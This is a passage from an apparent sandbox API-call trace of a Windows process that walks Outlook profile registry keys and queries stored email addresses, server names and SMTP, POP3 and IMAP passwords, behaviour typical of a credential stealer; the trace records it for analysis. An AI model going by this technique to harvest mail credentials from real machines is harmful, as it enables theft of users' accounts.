returned 0x5d1a20 [0590.219] RegQueryValueExW (in: hKey=0x664, lpValueName="POP3 User", lpReserved=0x0, lpType=0x0, lpData=0x5d1a20, lpcbData=0x52c21c*=0x1e | out: lpType=0x0, lpData=0x5d1a20*=0x73, lpcbData=0x52c21c*=0x1e) returned 0x0 [0590.219] RegCloseKey (hKey=0x664) returned 0x0 [0590.219] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x20019, phkResult=0x52c210 | out: phkResult=0x52c210*=0x664) returned 0x0 [0590.219] RegQueryValueExW (in: hKey=0x664, lpValueName="IMAP User", lpReserved=0x0, lpType=0x52c1f8, lpData=0x0, lpcbData=0x52c20c*=0x0 | out: lpType=0x52c1f8*=0x0, lpData=0x0, lpcbData=0x52c20c*=0x0) returned 0x2 [0590.219] RegCloseKey (hKey=0x664) returned 0x0 [0590.219] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x20219, phkResult=0x52c1e4 | out: phkResult=0x52c1e4*=0x664) returned 0x0 [0590.219] RegQueryValueExW (in: hKey=0x664, lpValueName="IMAP User", lpReserved=0x0, lpType=0x52c1cc, lpData=0x0, lpcbData=0x52c1e0*=0x0 | out: lpType=0x52c1cc*=0x0, lpData=0x0, lpcbData=0x52c1e0*=0x0) returned 0x2 [0590.219] RegCloseKey (hKey=0x664) returned 0x0 [0590.219] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x20119, phkResult=0x52c1b8 | out: phkResult=0x52c1b8*=0x664) returned 0x0 [0590.219] RegQueryValueExW (in: hKey=0x664, lpValueName="IMAP User", lpReserved=0x0, lpType=0x52c1a0, lpData=0x0, lpcbData=0x52c1b4*=0x0 | out: lpType=0x52c1a0*=0x0, lpData=0x0, lpcbData=0x52c1b4*=0x0) returned 0x2 [0590.220] RegCloseKey (hKey=0x664) returned 0x0 [0590.220] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x20019, phkResult=0x52c1e0 | out: phkResult=0x52c1e0*=0x664) returned 0x0 [0590.220] RegQueryValueExW (in: hKey=0x664, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x52c1c8, lpData=0x0, lpcbData=0x52c1dc*=0x52c200 | out: lpType=0x52c1c8*=0x0, lpData=0x0, lpcbData=0x52c1dc*=0x0) returned 0x2 [0590.220] RegCloseKey (hKey=0x664) returned 0x0 [0590.220] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x20219, phkResult=0x52c1b4 | out: phkResult=0x52c1b4*=0x664) returned 0x0 [0590.220] RegQueryValueExW (in: hKey=0x664, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x52c19c, lpData=0x0, lpcbData=0x52c1b0*=0x52c200 | out: lpType=0x52c19c*=0x0, lpData=0x0, lpcbData=0x52c1b0*=0x0) returned 0x2 [0590.220] RegCloseKey (hKey=0x664) returned 0x0 [0590.220] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x20119, phkResult=0x52c188 | out: phkResult=0x52c188*=0x664) returned 0x0 [0590.220] RegQueryValueExW (in: hKey=0x664, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x52c170, lpData=0x0, lpcbData=0x52c184*=0x52c200 | out: lpType=0x52c170*=0x0, lpData=0x0, lpcbData=0x52c184*=0x0) returned 0x2 [0590.220] RegCloseKey (hKey=0x664) returned 0x0 [0590.220] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x20019, phkResult=0x52c1d4 | out: phkResult=0x52c1d4*=0x664) returned 0x0 [0590.220] RegQueryValueExW (in: hKey=0x664, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x52c1bc, lpData=0x0, lpcbData=0x52c1d0*=0x52c1f4 | out: lpType=0x52c1bc*=0x0, lpData=0x0, lpcbData=0x52c1d0*=0x0) returned 0x2 [0590.220] RegCloseKey (hKey=0x664) returned 0x0 [0590.220] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x20219, phkResult=0x52c1a8 | out: phkResult=0x52c1a8*=0x664) returned 0x0 [0590.220] RegQueryValueExW (in: hKey=0x664, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x52c190, lpData=0x0, lpcbData=0x52c1a4*=0x52c1f4 | out: lpType=0x52c190*=0x0, lpData=0x0, lpcbData=0x52c1a4*=0x0) returned 0x2 [0590.220] RegCloseKey (hKey=0x664) returned 0x0 [0590.220] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x20119, phkResult=0x52c17c | out: phkResult=0x52c17c*=0x664) returned 0x0 [0590.220] RegQueryValueExW (in: hKey=0x664, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x52c164, lpData=0x0, lpcbData=0x52c178*=0x52c1f4 | out: lpType=0x52c164*=0x0, lpData=0x0, lpcbData=0x52c178*=0x0) returned 0x2 [0590.220] RegCloseKey (hKey=0x664) returned 0x0 [0590.220] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x20019, phkResult=0x52c210 | out: phkResult=0x52c210*=0x664) returned 0x0 [0590.220] RegQueryValueExW (in: hKey=0x664, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x52c1f8, lpData=0x0, lpcbData=0x52c20c*=0x52c230 | out: lpType=0x52c1f8*=0x0, lpData=0x0, lpcbData=0x52c20c*=0x0) returned 0x2 [0590.220] RegCloseKey (hKey=0x664) returned 0x0 [0590.220] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x20219, phkResult=0x52c1e4 | out: phkResult=0x52c1e4*=0x664) returned 0x0 [0590.221] RegQueryValueExW (in: hKey=0x664, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x52c1cc, lpData=0x0, lpcbData=0x52c1e0*=0x52c230 | out: lpType=0x52c1cc*=0x0, lpData=0x0, lpcbData=0x52c1e0*=0x0) returned 0x2 [0590.221] RegCloseKey (hKey=0x664) returned 0x0 [0590.221] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x20119, phkResult=0x52c1b8 | out: phkResult=0x52c1b8*=0x664) returned 0x0 [0590.221] RegQueryValueExW (in: hKey=0x664, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x52c1a0, lpData=0x0, lpcbData=0x52c1b4*=0x52c230 | out: lpType=0x52c1a0*=0x0, lpData=0x0, lpcbData=0x52c1b4*=0x0) returned 0x2 [0590.221] RegCloseKey (hKey=0x664) returned 0x0 [0590.221] LocalFree (hMem=0x5d1978) returned 0x0 [0590.221] LocalFree (hMem=0x58d548) returned 0x0 [0590.221] LocalFree (hMem=0x58d840) returned 0x0 [0590.221] LocalFree (hMem=0x5d1a20) returned 0x0 [0590.221] LocalFree (hMem=0x63f8c8) returned 0x0 [0590.221] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x2, lpName=0x52c2b0, lpcchName=0x52c2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="00000003", lpcchName=0x52c2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.221] lstrlenW (lpString="\\") returned 1 [0590.221] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676") returned 88 [0590.221] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56cab0 [0590.221] lstrlenW (lpString="00000003") returned 8 [0590.221] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\") returned 89 [0590.221] LocalAlloc (uFlags=0x40, uBytes=0x144) returned 0x63f8c8 [0590.221] LocalFree (hMem=0x56cab0) returned 0x0 [0590.221] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20019, phkResult=0x52c230 | out: phkResult=0x52c230*=0x664) returned 0x0 [0590.221] RegQueryValueExW (in: hKey=0x664, lpValueName="Email", lpReserved=0x0, lpType=0x52c218, lpData=0x0, lpcbData=0x52c22c*=0x0 | out: lpType=0x52c218*=0x0, lpData=0x0, lpcbData=0x52c22c*=0x0) returned 0x2 [0590.221] RegCloseKey (hKey=0x664) returned 0x0 [0590.221] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20219, phkResult=0x52c204 | out: phkResult=0x52c204*=0x664) returned 0x0 [0590.221] RegQueryValueExW (in: hKey=0x664, lpValueName="Email", lpReserved=0x0, lpType=0x52c1ec, lpData=0x0, lpcbData=0x52c200*=0x0 | out: lpType=0x52c1ec*=0x0, lpData=0x0, lpcbData=0x52c200*=0x0) returned 0x2 [0590.221] RegCloseKey (hKey=0x664) returned 0x0 [0590.221] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20119, phkResult=0x52c1d8 | out: phkResult=0x52c1d8*=0x664) returned 0x0 [0590.221] RegQueryValueExW (in: hKey=0x664, lpValueName="Email", lpReserved=0x0, lpType=0x52c1c0, lpData=0x0, lpcbData=0x52c1d4*=0x0 | out: lpType=0x52c1c0*=0x0, lpData=0x0, lpcbData=0x52c1d4*=0x0) returned 0x2 [0590.221] RegCloseKey (hKey=0x664) returned 0x0 [0590.221] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20019, phkResult=0x52c220 | out: phkResult=0x52c220*=0x664) returned 0x0 [0590.221] RegQueryValueExW (in: hKey=0x664, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x52c208, lpData=0x0, lpcbData=0x52c21c*=0x0 | out: lpType=0x52c208*=0x0, lpData=0x0, lpcbData=0x52c21c*=0x0) returned 0x2 [0590.221] RegCloseKey (hKey=0x664) returned 0x0 [0590.221] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20219, phkResult=0x52c1f4 | out: phkResult=0x52c1f4*=0x664) returned 0x0 [0590.222] RegQueryValueExW (in: hKey=0x664, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x52c1dc, lpData=0x0, lpcbData=0x52c1f0*=0x0 | out: lpType=0x52c1dc*=0x0, lpData=0x0, lpcbData=0x52c1f0*=0x0) returned 0x2 [0590.222] RegCloseKey (hKey=0x664) returned 0x0 [0590.222] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20119, phkResult=0x52c1c8 | out: phkResult=0x52c1c8*=0x664) returned 0x0 [0590.222] RegQueryValueExW (in: hKey=0x664, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x52c1b0, lpData=0x0, lpcbData=0x52c1c4*=0x0 | out: lpType=0x52c1b0*=0x0, lpData=0x0, lpcbData=0x52c1c4*=0x0) returned 0x2 [0590.222] RegCloseKey (hKey=0x664) returned 0x0 [0590.222] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20019, phkResult=0x52c210 | out: phkResult=0x52c210*=0x664) returned 0x0 [0590.222] RegQueryValueExW (in: hKey=0x664, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x52c1f8, lpData=0x0, lpcbData=0x52c20c*=0x0 | out: lpType=0x52c1f8*=0x0, lpData=0x0, lpcbData=0x52c20c*=0x0) returned 0x2 [0590.222] RegCloseKey (hKey=0x664) returned 0x0 [0590.222] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20219, phkResult=0x52c1e4 | out: phkResult=0x52c1e4*=0x664) returned 0x0 [0590.222] RegQueryValueExW (in: hKey=0x664, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x52c1cc, lpData=0x0, lpcbData=0x52c1e0*=0x0 | out: lpType=0x52c1cc*=0x0, lpData=0x0, lpcbData=0x52c1e0*=0x0) returned 0x2 [0590.222] RegCloseKey (hKey=0x664) returned 0x0 [0590.222] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20119, phkResult=0x52c1b8 | out: phkResult=0x52c1b8*=0x664) returned 0x0 [0590.222] RegQueryValueExW (in: hKey=0x664, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x52c1a0, lpData=0x0, lpcbData=0x52c1b4*=0x0 | out: lpType=0x52c1a0*=0x0, lpData=0x0, lpcbData=0x52c1b4*=0x0) returned 0x2 [0590.222] RegCloseKey (hKey=0x664) returned 0x0 [0590.222] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20019, phkResult=0x52c200 | out: phkResult=0x52c200*=0x664) returned 0x0 [0590.222] RegQueryValueExW (in: hKey=0x664, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x52c1e8, lpData=0x0, lpcbData=0x52c1fc*=0x0 | out: lpType=0x52c1e8*=0x0, lpData=0x0, lpcbData=0x52c1fc*=0x0) returned 0x2 [0590.222] RegCloseKey (hKey=0x664) returned 0x0 [0590.222] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20219, phkResult=0x52c1d4 | out: phkResult=0x52c1d4*=0x664) returned 0x0 [0590.222] RegQueryValueExW (in: hKey=0x664, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x52c1bc, lpData=0x0, lpcbData=0x52c1d0*=0x0 | out: lpType=0x52c1bc*=0x0, lpData=0x0, lpcbData=0x52c1d0*=0x0) returned 0x2 [0590.222] RegCloseKey (hKey=0x664) returned 0x0 [0590.222] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20119, phkResult=0x52c1a8 | out: phkResult=0x52c1a8*=0x664) returned 0x0 [0590.222] RegQueryValueExW (in: hKey=0x664, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x52c190, lpData=0x0, lpcbData=0x52c1a4*=0x0 | out: lpType=0x52c190*=0x0, lpData=0x0, lpcbData=0x52c1a4*=0x0) returned 0x2 [0590.223] RegCloseKey (hKey=0x664) returned 0x0 [0590.223] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20019, phkResult=0x52c230 | out: phkResult=0x52c230*=0x664) returned 0x0 [0590.223] RegQueryValueExW (in: hKey=0x664, lpValueName="SMTP User", lpReserved=0x0, lpType=0x52c218, lpData=0x0, lpcbData=0x52c22c*=0x0 | out: lpType=0x52c218*=0x0, lpData=0x0, lpcbData=0x52c22c*=0x0) returned 0x2 [0590.223] RegCloseKey (hKey=0x664) returned 0x0 [0590.223] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20219, phkResult=0x52c204 | out: phkResult=0x52c204*=0x664) returned 0x0 [0590.223] RegQueryValueExW (in: hKey=0x664, lpValueName="SMTP User", lpReserved=0x0, lpType=0x52c1ec, lpData=0x0, lpcbData=0x52c200*=0x0 | out: lpType=0x52c1ec*=0x0, lpData=0x0, lpcbData=0x52c200*=0x0) returned 0x2 [0590.223] RegCloseKey (hKey=0x664) returned 0x0 [0590.223] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20119, phkResult=0x52c1d8 | out: phkResult=0x52c1d8*=0x664) returned 0x0 [0590.223] RegQueryValueExW (in: hKey=0x664, lpValueName="SMTP User", lpReserved=0x0, lpType=0x52c1c0, lpData=0x0, lpcbData=0x52c1d4*=0x0 | out: lpType=0x52c1c0*=0x0, lpData=0x0, lpcbData=0x52c1d4*=0x0) returned 0x2 [0590.223] RegCloseKey (hKey=0x664) returned 0x0 [0590.223] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20019, phkResult=0x52c220 | out: phkResult=0x52c220*=0x664) returned 0x0 [0590.223] RegQueryValueExW (in: hKey=0x664, lpValueName="POP3 User", lpReserved=0x0, lpType=0x52c208, lpData=0x0, lpcbData=0x52c21c*=0x0 | out: lpType=0x52c208*=0x0, lpData=0x0, lpcbData=0x52c21c*=0x0) returned 0x2 [0590.223] RegCloseKey (hKey=0x664) returned 0x0 [0590.223] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20219, phkResult=0x52c1f4 | out: phkResult=0x52c1f4*=0x664) returned 0x0 [0590.223] RegQueryValueExW (in: hKey=0x664, lpValueName="POP3 User", lpReserved=0x0, lpType=0x52c1dc, lpData=0x0, lpcbData=0x52c1f0*=0x0 | out: lpType=0x52c1dc*=0x0, lpData=0x0, lpcbData=0x52c1f0*=0x0) returned 0x2 [0590.223] RegCloseKey (hKey=0x664) returned 0x0 [0590.223] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20119, phkResult=0x52c1c8 | out: phkResult=0x52c1c8*=0x664) returned 0x0 [0590.223] RegQueryValueExW (in: hKey=0x664, lpValueName="POP3 User", lpReserved=0x0, lpType=0x52c1b0, lpData=0x0, lpcbData=0x52c1c4*=0x0 | out: lpType=0x52c1b0*=0x0, lpData=0x0, lpcbData=0x52c1c4*=0x0) returned 0x2 [0590.223] RegCloseKey (hKey=0x664) returned 0x0 [0590.223] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20019, phkResult=0x52c210 | out: phkResult=0x52c210*=0x664) returned 0x0 [0590.223] RegQueryValueExW (in: hKey=0x664, lpValueName="IMAP User", lpReserved=0x0, lpType=0x52c1f8, lpData=0x0, lpcbData=0x52c20c*=0x0 | out: lpType=0x52c1f8*=0x0, lpData=0x0, lpcbData=0x52c20c*=0x0) returned 0x2 [0590.223] RegCloseKey (hKey=0x664) returned 0x0 [0590.224] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20219, phkResult=0x52c1e4 | out: phkResult=0x52c1e4*=0x664) returned 0x0 [0590.224] RegQueryValueExW (in: hKey=0x664, lpValueName="IMAP User", lpReserved=0x0, lpType=0x52c1cc, lpData=0x0, lpcbData=0x52c1e0*=0x0 | out: lpType=0x52c1cc*=0x0, lpData=0x0, lpcbData=0x52c1e0*=0x0) returned 0x2 [0590.224] RegCloseKey (hKey=0x664) returned 0x0 [0590.224] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20119, phkResult=0x52c1b8 | out: phkResult=0x52c1b8*=0x664) returned 0x0 [0590.224] RegQueryValueExW (in: hKey=0x664, lpValueName="IMAP User", lpReserved=0x0, lpType=0x52c1a0, lpData=0x0, lpcbData=0x52c1b4*=0x0 | out: lpType=0x52c1a0*=0x0, lpData=0x0, lpcbData=0x52c1b4*=0x0) returned 0x2 [0590.224] RegCloseKey (hKey=0x664) returned 0x0 [0590.224] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20019, phkResult=0x52c1e0 | out: phkResult=0x52c1e0*=0x664) returned 0x0 [0590.224] RegQueryValueExW (in: hKey=0x664, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x52c1c8, lpData=0x0, lpcbData=0x52c1dc*=0x52c200 | out: lpType=0x52c1c8*=0x0, lpData=0x0, lpcbData=0x52c1dc*=0x0) returned 0x2 [0590.224] RegCloseKey (hKey=0x664) returned 0x0 [0590.224] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20219, phkResult=0x52c1b4 | out: phkResult=0x52c1b4*=0x664) returned 0x0 [0590.224] RegQueryValueExW (in: hKey=0x664, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x52c19c, lpData=0x0, lpcbData=0x52c1b0*=0x52c200 | out: lpType=0x52c19c*=0x0, lpData=0x0, lpcbData=0x52c1b0*=0x0) returned 0x2 [0590.224] RegCloseKey (hKey=0x664) returned 0x0 [0590.224] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20119, phkResult=0x52c188 | out: phkResult=0x52c188*=0x664) returned 0x0 [0590.224] RegQueryValueExW (in: hKey=0x664, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x52c170, lpData=0x0, lpcbData=0x52c184*=0x52c200 | out: lpType=0x52c170*=0x0, lpData=0x0, lpcbData=0x52c184*=0x0) returned 0x2 [0590.224] RegCloseKey (hKey=0x664) returned 0x0 [0590.224] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20019, phkResult=0x52c1d4 | out: phkResult=0x52c1d4*=0x664) returned 0x0 [0590.224] RegQueryValueExW (in: hKey=0x664, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x52c1bc, lpData=0x0, lpcbData=0x52c1d0*=0x52c1f4 | out: lpType=0x52c1bc*=0x0, lpData=0x0, lpcbData=0x52c1d0*=0x0) returned 0x2 [0590.224] RegCloseKey (hKey=0x664) returned 0x0 [0590.224] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20219, phkResult=0x52c1a8 | out: phkResult=0x52c1a8*=0x664) returned 0x0 [0590.224] RegQueryValueExW (in: hKey=0x664, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x52c190, lpData=0x0, lpcbData=0x52c1a4*=0x52c1f4 | out: lpType=0x52c190*=0x0, lpData=0x0, lpcbData=0x52c1a4*=0x0) returned 0x2 [0590.224] RegCloseKey (hKey=0x664) returned 0x0 [0590.224] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20119, phkResult=0x52c17c | out: phkResult=0x52c17c*=0x664) returned 0x0 [0590.225] RegQueryValueExW (in: hKey=0x664, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x52c164, lpData=0x0, lpcbData=0x52c178*=0x52c1f4 | out: lpType=0x52c164*=0x0, lpData=0x0, lpcbData=0x52c178*=0x0) returned 0x2 [0590.225] RegCloseKey (hKey=0x664) returned 0x0 [0590.225] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20019, phkResult=0x52c210 | out: phkResult=0x52c210*=0x664) returned 0x0 [0590.225] RegQueryValueExW (in: hKey=0x664, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x52c1f8, lpData=0x0, lpcbData=0x52c20c*=0x52c230 | out: lpType=0x52c1f8*=0x0, lpData=0x0, lpcbData=0x52c20c*=0x0) returned 0x2 [0590.225] RegCloseKey (hKey=0x664) returned 0x0 [0590.225] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20219, phkResult=0x52c1e4 | out: phkResult=0x52c1e4*=0x664) returned 0x0 [0590.225] RegQueryValueExW (in: hKey=0x664, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x52c1cc, lpData=0x0, lpcbData=0x52c1e0*=0x52c230 | out: lpType=0x52c1cc*=0x0, lpData=0x0, lpcbData=0x52c1e0*=0x0) returned 0x2 [0590.225] RegCloseKey (hKey=0x664) returned 0x0 [0590.225] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20119, phkResult=0x52c1b8 | out: phkResult=0x52c1b8*=0x664) returned 0x0 [0590.225] RegQueryValueExW (in: hKey=0x664, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x52c1a0, lpData=0x0, lpcbData=0x52c1b4*=0x52c230 | out: lpType=0x52c1a0*=0x0, lpData=0x0, lpcbData=0x52c1b4*=0x0) returned 0x2 [0590.225] RegCloseKey (hKey=0x664) returned 0x0 [0590.225] LocalFree (hMem=0x63f8c8) returned 0x0 [0590.225] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x3, lpName=0x52c2b0, lpcchName=0x52c2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="00000003", lpcchName=0x52c2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.225] RegCloseKey (hKey=0x2e4) returned 0x0 [0590.225] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.225] RegEnumKeyExW (in: hKey=0x4d0, dwIndex=0xd, lpName=0x52d2ec, lpcchName=0x52d2e4, lpReserved=0x0, 